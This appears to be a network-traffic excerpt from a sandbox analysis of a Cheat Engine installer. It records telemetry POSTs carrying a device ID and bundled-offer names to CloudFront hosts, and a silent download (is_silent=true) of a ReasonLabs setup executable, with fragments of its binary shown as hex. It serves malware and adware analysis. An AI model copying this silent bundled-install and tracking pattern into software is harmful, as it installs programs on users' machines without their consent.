Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:36 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 412 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:21:36 UTC	412	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 41 64 76 69 73 6f 72 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 65 62 41 64 76 69 73 6f 72 5f 56 33 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WebAdvisor\",\"18\":\"ZB_WebAdvisor_V3\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\
2024-12-28 21:21:37 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:21:37 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 81ca2982b40de033ec660f6290bc0e20.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: 0k1coGraUdMyerbC7L3S2XwGWh_QqXKW3aBUV7e9GyU5oIUS1Z-C1Q==
2024-12-28 21:21:37 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49896	3.165.135.3	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:39 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 459 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:21:39 UTC	459	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:21:40 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:21:39 GMT Via: 1.1 b2ba040f19ad0239b9239a26b1640b9e.cloudfront.net (CloudFront), 1.1 07a26444aa664d975523a497b1ae5758.cloudfront.net (CloudFront) X-Amz-Cf-Pop: CDG52-P4 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: CDG52-P3 X-Amz-Cf-Id: wzbZvkixasqKfOKQfybgbbPhM_xfA1bSW-koSe-9HtCI_tdgdVXY9w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49903	65.9.108.93	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:42 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 400 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:21:42 UTC	400	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 61 74 68 65 72 5a 65 72 6f 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 5a 5f 56 31 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 33 5c 22 Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WeatherZero\",\"18\":\"ZB_WZ_V1\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"3\"
2024-12-28 21:21:43 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:21:43 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 43ea48c3f6365b58e0e610399bbffb40.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: KcatZQj5atNMzo2UPwseLqGCctvixSD6QP7kQgJeluz8vABq2WcFfA==
2024-12-28 21:21:43 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49911	3.165.135.3	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:45 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 447 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:21:45 UTC	447	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:21:46 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:21:45 GMT Via: 1.1 fab151d68d1a2f6afb087e422136c6fe.cloudfront.net (CloudFront), 1.1 f0ff45e105821feb76f7404e065f9c6e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: CDG52-P4 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: CDG52-P3 X-Amz-Cf-Id: CpM0czJf9J1JGiiRR3pekXHuxGCdjDNtYq70EAek4IpvUlmLo15vSA==

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49920	18.66.161.123	443

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:48 UTC	273	OUT	GET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1 Host: shield.reasonsecurity.com Connection: Keep-Alive
2024-12-28 21:21:49 UTC	1149	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 2552264 Connection: close Date: Sat, 28 Dec 2024 21:21:49 GMT ETag: W/"26f1c8-cpAH4A64hrlE9LSVJ23kBLeZFJ8" Access-Control-Allow-Origin: * Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 content-disposition: attachment; filename=ReasonLabs-Setup-Wizard.exe X-Cache: Miss from cloudfront Via: 1.1 7cb7aff585b14d8a9957e9d3c12f8186.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH52-C1 X-Amz-Cf-Id: qqTnyurNQ32lUVH-EaRn3ns3-pyqhnyg0j-VK8ycavDQBYnGtpPdng==
2024-12-28 21:21:49 UTC	3364	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 4b 61 00 ed 2a 0f 53 ed 2a 0f 53 ed 2a 0f 53 82 35 04 53 ee 2a 0f 53 6e 36 01 53 e5 2a 0f 53 82 35 05 53 e6 2a 0f 53 82 35 0b 53 ef 2a 0f 53 63 22 50 53 ec 2a 0f 53 ed 2a 0e 53 64 2a 0f 53 6e 22 52 53 e4 2a 0f 53 db 0c 04 53 ae 2a 0f 53 fb 55 0b 52 ec 2a 0f 53 db 0c 05 53 ef 2a 0f 53 f6 b7 a5 53 e1 2a 0f 53 75 58 0c 52 ec 2a 0f 53 2a 2c 09 53 ec 2a 0f 53 52 69 63 68 ed 2a 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KaSSS5SSn6SS5SS5SSc"PSSSdSn"RSSSSURSSSSSuXRS,SSRich*
2024-12-28 21:21:50 UTC	8192	IN	Data Raw: 31 00 00 ff 75 e4 e8 b4 18 00 00 59 ff 36 e8 ac 18 00 00 59 5e 8b 4d f4 64 89 0d 00 00 00 00 c9 c3 8b 41 04 3b 42 04 75 13 8b 12 8b 09 52 51 ff 15 48 b1 41 00 59 85 c0 59 75 01 c3 6a 01 58 c3 55 8b ec 81 ec 14 01 00 00 8d 85 ec fe ff ff c7 85 ec fe ff ff 14 01 00 00 50 ff 15 cc b0 41 00 85 c0 74 0e 83 bd fc fe ff ff 02 75 05 6a 01 58 c9 c3 33 c0 c9 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c 89 48 10 88 48 14 88 48 15 c7 00 28 b7 41 00 c3 56 8b 74 24 10 6a 10 68 cc c3 41 00 ff 74 24 14 83 26 00 e8 21 7e 01 00 83 c4 0c 85 c0 75 0d 8b 44 24 08 89 06 ff 40 04 33 c0 eb 05 b8 02 40 00 80 5e c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 d9 17 00 00 59 33 c0 5e c2 04 00 c7 01 28 b7 41 00 83 c1 08 e9 3d 02 00 00 b8 e4 9e 41 Data Ascii: 1uY6Y^MdA;BuRQHAYYujXUPAtujX33HHHHHH(AVt$jhAt$&!~uD$@3@^Vt$NFutVY3^(A=A
2024-12-28 21:21:50 UTC	6288	IN	Data Raw: f1 ff 15 5c b1 41 00 8b f8 3b 7e 08 76 1c 8d 44 3f 02 53 50 e8 72 f8 ff ff ff 36 8b d8 e8 9d f8 ff ff 59 89 1e 59 89 7e 08 5b 8b 4c 24 0c 8d 47 01 89 7e 04 8b 36 85 c0 76 0d 66 8b 11 66 89 16 46 46 41 41 48 75 f3 5f 5e c2 04 00 55 8b ec 51 53 8b 5d 08 56 33 f6 80 3b 00 57 8b f9 74 07 46 80 3c 1e 00 75 f9 3b 77 08 76 1e 8d 44 36 02 50 e8 16 f8 ff ff ff 37 89 45 fc e8 40 f8 ff ff 8b 45 fc 59 59 89 07 89 77 08 8b 07 33 c9 85 f6 76 16 8b d0 eb 03 8b 5d 08 66 0f b6 1c 19 66 89 1a 41 42 42 3b ce 72 ee 66 83 24 70 00 89 77 04 8b c7 5f 5e 5b c9 c2 04 00 6a 2e e8 53 e5 ff ff c3 6a 20 e8 4b e5 ff ff c3 83 79 04 00 74 05 e9 ed ff ff ff c3 53 8b 5c 24 08 56 57 33 ff 8b f1 66 39 3b 74 0b 8b c3 47 40 40 66 83 38 00 75 f7 57 8b ce e8 a4 fb ff ff 8b 46 04 8b d3 8b 1e 8d Data Ascii: \A;~vD?SPr6YY~[L$G~6vffFFAAHu_^UQS]V3;WtF<u;wvD6P7E@EYYw3v]ffABB;rf$pw_^[j.Sj KytS\$VW3f9;tG@@f8uWF
2024-12-28 21:21:50 UTC	3198	IN	Data Raw: 4e 28 33 ff 83 fb 02 89 79 04 66 89 38 75 20 8d 45 e0 50 e8 a6 e6 ff ff eb 15 ff 75 0c 8b ce 50 e8 27 ff ff ff 84 c0 0f 84 e4 00 00 00 33 ff 66 81 66 20 ef fb 83 4d c4 ff 89 3e 89 7e 04 8d 45 e0 8d 4d c8 50 c6 45 fc 02 e8 de e5 ff ff 8d 4d ac c6 45 fc 03 e8 1f e5 ff ff 8d 45 0f 8d 4d c4 50 8d 45 ac 50 c6 45 fc 04 e8 8f fe ff ff 84 c0 74 34 80 7d 0f 00 74 26 8b 55 d4 8b 4d ac e8 b8 df ff ff 84 c0 75 23 ff 75 ac c6 45 fc 03 e8 9c df ff ff 59 8d 4d ac e8 dd e4 ff ff eb bc 6a 02 ff 15 80 b0 41 00 32 db eb 36 8b 4d b0 83 f9 07 76 11 8d 41 fa 3b c1 73 0a 8b 4d ac 89 45 b0 66 89 3c 41 8d 45 ac 8d 4e 28 50 e8 c1 e7 ff ff 8b 45 bc c6 46 24 01 89 06 8b 45 c0 89 46 04 b3 01 ff 75 ac e8 47 df ff ff ff 75 c8 e8 3f df ff ff 59 59 8d 4d c4 e8 f3 fb ff ff ff 75 e0 e8 2d Data Ascii: N(3yf8u EPuP'3ff M>~EMPEMEEMPEPEt4}t&UMu#uEYMjA26MvA;sMEf<AEN(PEF$EFuGu?YYMu-
2024-12-28 21:21:50 UTC	1146	IN	Data Raw: fd ff ff 85 c0 7d 04 33 c0 eb 04 8d 44 30 02 5f 5e c3 8b c1 66 8b 50 08 8d 48 08 66 83 fa 55 74 06 66 83 fa 75 75 30 66 8b 50 0a 66 83 fa 4e 74 06 66 83 fa 6e 75 20 66 8b 50 0c 66 83 fa 43 74 06 66 83 fa 63 75 10 66 8b 50 0e 66 83 fa 5c 74 16 66 83 fa 2f 74 10 e8 d4 fc ff ff 85 c0 7d 03 33 c0 c3 83 c0 05 c3 8d 48 10 e8 7c ff ff ff 8d 48 08 f7 d8 1b c0 23 c1 c3 b8 f0 a3 41 00 e8 1b 39 01 00 83 ec 24 53 56 57 8b fa 8b d9 57 8b 4d 08 e8 46 d9 ff ff 8b cf e8 a6 fe ff ff 8b f0 85 f6 74 59 83 fe 01 74 54 8d 1c 36 03 fb 8b cf e8 3e 02 00 00 84 c0 74 3d 57 8d 4d d0 e8 5d d8 ff ff 83 65 fc 00 8d 4d d0 e8 17 01 00 00 84 c0 74 1b 8b 4d 08 3b 71 04 73 0a 8b 01 89 71 04 66 83 24 03 00 8d 45 d0 50 e8 26 db ff ff ff 75 d0 e8 bd d2 ff ff 59 b0 01 e9 d7 00 00 00 8d 4d e8 Data Ascii: }3D0_^fPHfUtfuu0fPfNtfnu fPfCtfcufPf\tf/t}3H\|H#A9$SVWWMFtYtT6>t=WM]eMtM;qsqf$EP&uYM
2024-12-28 21:21:50 UTC	4344	IN	Data Raw: 0c 8b c6 5e c2 04 00 0f b7 01 83 f8 07 76 20 83 f8 09 76 14 83 f8 0b 76 16 83 f8 0f 76 0a 83 f8 17 76 0c 83 f8 40 74 07 51 ff 15 58 b1 41 00 c3 56 8b f1 0f b7 06 83 f8 07 76 19 83 f8 09 76 1b 83 f8 0b 76 0f 83 f8 0f 76 11 83 f8 17 76 05 83 f8 40 75 07 33 c9 66 89 0e eb 12 56 ff 15 58 b1 41 00 33 c9 3b c1 75 19 66 39 0e 75 14 89 4e 08 66 89 4e 02 66 89 4e 04 66 89 4e 06 89 4e 0c 33 c0 5e c3 66 83 39 00 75 08 66 83 61 02 00 33 c0 c3 e9 9a ff ff ff 53 57 8b 7c 24 0c 8b d9 66 83 3f 00 74 0b 8b cf e8 85 ff ff ff 85 c0 7c 13 56 8b f3 a5 a5 a5 a5 66 83 23 00 66 83 63 02 00 33 c0 5e 5f 5b c2 04 00 56 8b f1 66 83 3e 00 75 09 66 83 66 02 00 33 c0 5e c3 8b ce e8 a3 ff ff ff 85 c0 7d 08 66 c7 06 0a 00 89 46 08 5e c3 b8 04 a4 41 00 e8 2c 34 01 00 81 ec 10 02 00 00 53 Data Ascii: ^v vvvv@tQXAVvvvvv@u3fVXA3;uf9uNfNfNfNN3^f9ufa3SW\|$f?t\|Vf#fc3^_[Vf>uff3^}fF^A,4S
2024-12-28 21:21:50 UTC	8192	IN	Data Raw: 85 c0 75 0d 8b 75 08 8b c6 8d 4e 0c e9 c9 00 00 00 53 68 b0 b1 41 00 56 e8 2f 24 01 00 83 c4 0c 85 c0 75 0d 8b 75 08 8b c6 8d 4e 10 e9 a9 00 00 00 53 68 40 b3 41 00 56 e8 0f 24 01 00 83 c4 0c 85 c0 75 0d 8b 75 08 8b c6 8d 4e 14 e9 89 00 00 00 53 68 c0 b1 41 00 56 e8 ef 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 18 eb 6c 53 68 00 b2 41 00 56 e8 d2 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 1c eb 4f 53 68 60 b3 41 00 56 e8 b5 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 20 eb 32 53 bb a0 b2 41 00 53 56 e8 97 23 01 00 83 c4 0c 85 c0 75 2d 8b 75 08 39 46 64 8d 4e 64 75 0e 8b 46 68 51 53 50 8b 10 ff 12 85 c0 75 19 8b c6 8d 4e 24 f7 d8 1b c0 23 c1 89 07 ff 46 28 33 c0 eb 05 b8 02 40 00 80 5f 5e 5b 5d c2 0c 00 8b 44 24 04 ff 40 28 8b 40 28 Data Ascii: uuNShAV/$uuNSh@AV$uuNShAV#uuNlShAV#uuNOSh`AV#uuN 2SASV#u-u9FdNduFhQSPuN$#F(3@_^[]D$@(@(
2024-12-28 21:21:50 UTC	3198	IN	Data Raw: 08 89 7e 0c e8 80 a3 ff ff 89 7e 1c 89 7e 20 89 7e 24 8b c6 5f 5e c3 56 57 8b f9 8b 77 04 85 f6 74 1e 53 8b 07 4e 8b 1c b0 85 db 74 0e 8b cb e8 48 89 ff ff 53 e8 05 9e ff ff 59 85 f6 75 e4 5b 83 67 04 00 5f 5e c3 53 8b 59 04 83 fb 01 76 4b 56 8b 31 57 8b fb 83 ee 04 d1 ef ff 74 24 14 8b d7 8b ce ff 74 24 14 53 e8 51 01 00 00 4f 75 eb 8d 3c 9e ff 74 24 14 8b 4e 04 8b 07 4b ff 74 24 14 89 0f 8b ce 83 ef 04 53 6a 01 5a 89 46 04 e8 2a 01 00 00 83 fb 01 77 da 5f 5e 5b c2 08 00 b8 6a a6 41 00 e8 83 03 01 00 51 56 57 8b f1 6a 18 e8 56 9d ff ff 8b f8 59 89 7d f0 83 65 fc 00 85 ff 74 1f 53 8b 5d 08 53 8b cf e8 6d a3 ff ff 83 c3 0c 8d 4f 0c 53 c6 45 fc 01 e8 5d a3 ff ff 5b eb 02 33 ff 8b 46 04 8d 48 01 89 4e 04 8b 0e 89 3c 81 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9 Data Ascii: ~~~ ~$_^VWwtSNtHSYu[g_^SYvKV1Wt$t$SQOu<t$NKt$SjZF*w_^[jAQVWjVY}etS]SmOSE][3FHN<M_^d
2024-12-28 21:21:50 UTC	1642	IN	Data Raw: 62 e1 ff ff 85 c0 75 0e 8d 55 d8 8b cb e8 61 e1 ff ff 85 c0 74 07 8b f0 e9 92 01 00 00 8b 45 d8 89 47 68 8b 45 dc 89 47 6c 80 7e 19 00 0f 84 73 01 00 00 8b 45 c0 89 45 e0 33 c0 39 45 e4 7c 06 8b 4d e8 89 4d e0 39 45 e0 89 45 ec 0f 86 54 01 00 00 8b 45 bc 8b 4d ec 33 db 8b 04 88 89 47 3c 8b 46 38 3b c3 74 13 8b 08 8d 55 d8 52 53 50 ff 51 0c 3b c3 0f 85 6b 01 00 00 8b 4e 30 3b cb 74 0d e8 e0 e0 ff ff 3b c3 0f 85 57 01 00 00 89 5d 08 8d 45 08 8b cf 50 c6 45 fc 04 ff 77 3c 56 e8 f9 fc ff ff 3b c3 89 45 e4 0f 85 3d 01 00 00 8b 45 08 3b c3 75 09 c6 45 fc 03 e9 d8 00 00 00 8b 4e 30 3b cb 74 1e 8b 55 d0 ff 76 38 89 55 c8 8b 55 d4 8d 5d c8 89 55 cc 8b 10 53 51 50 ff 52 0c 8b d8 eb 3c 89 5d e4 8b 08 8d 55 e4 52 68 c0 b4 41 00 50 c6 45 fc 05 ff 11 8b 45 e4 3b c3 0f Data Ascii: buUatEGhEGl~sEE39E\|MM9EETEM3G<F8;tURSPQ;kN0;t;W]EPEw<V;E=E;uEN0;tUv8UU]USQPR<]URhAPEE;
2024-12-28 21:21:50 UTC	2896	IN	Data Raw: 53 8b ce e8 b3 fc ff ff 80 66 17 00 8b f8 83 ff 01 0f 85 d3 01 00 00 83 7d e8 00 0f 84 c9 01 00 00 83 7b 3c 00 0f 84 bf 01 00 00 80 be ab 00 00 00 00 74 0c 84 86 ac 00 00 00 0f 84 aa 01 00 00 8b 46 28 83 f8 04 0f 86 3f 01 00 00 8b 46 28 8b 4e 24 8d 7e 24 ba 80 bc 41 00 8d 4c 41 f8 e8 be 8b ff ff 84 c0 0f 84 20 01 00 00 8b 46 28 8b cf 83 c0 fc 50 8d 45 d0 50 e8 02 ea ff ff 8b 03 83 65 08 00 c6 45 fc 03 83 78 0c 00 0f 86 f1 00 00 00 8b 40 08 8b 4d 08 ba 70 bc 41 00 8b 3c 88 8b 4f 10 e8 7a 8b ff ff 84 c0 0f 85 c2 00 00 00 8d 45 d0 8d 4d dc 50 e8 99 90 ff ff 8d 4d dc c6 45 fc 04 e8 89 92 ff ff 8d 45 c4 8b cf 50 e8 7a 01 00 00 50 8d 4d dc c6 45 fc 05 e8 d9 92 ff ff ff 75 c4 c6 45 fc 04 e8 6c 8a ff ff 59 8d 7e 18 8d 45 dc 8b cf 50 e8 ec 90 ff ff 68 78 bc 41 00 Data Ascii: Sf}{<tF(?F(N$~$ALA F(PEPeEx@MpA<OzEMPMEEPzPMEuElY~EPhxA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49921	3.165.135.3	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:49 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 457 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:21:49 UTC	457	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:21:50 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:21:49 GMT Via: 1.1 56455cfd91a1942216b3c22ed923150c.cloudfront.net (CloudFront), 1.1 6bdd3bc55276e6cf4b6e1b9d02e6e464.cloudfront.net (CloudFront) X-Amz-Cf-Pop: CDG52-P4 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: CDG52-P3 X-Amz-Cf-Id: pqTAiOWVE6csLTOZwIeEFaZ24OiB_BcgPC1sOPdeVK4R2Km0iBpmPw==

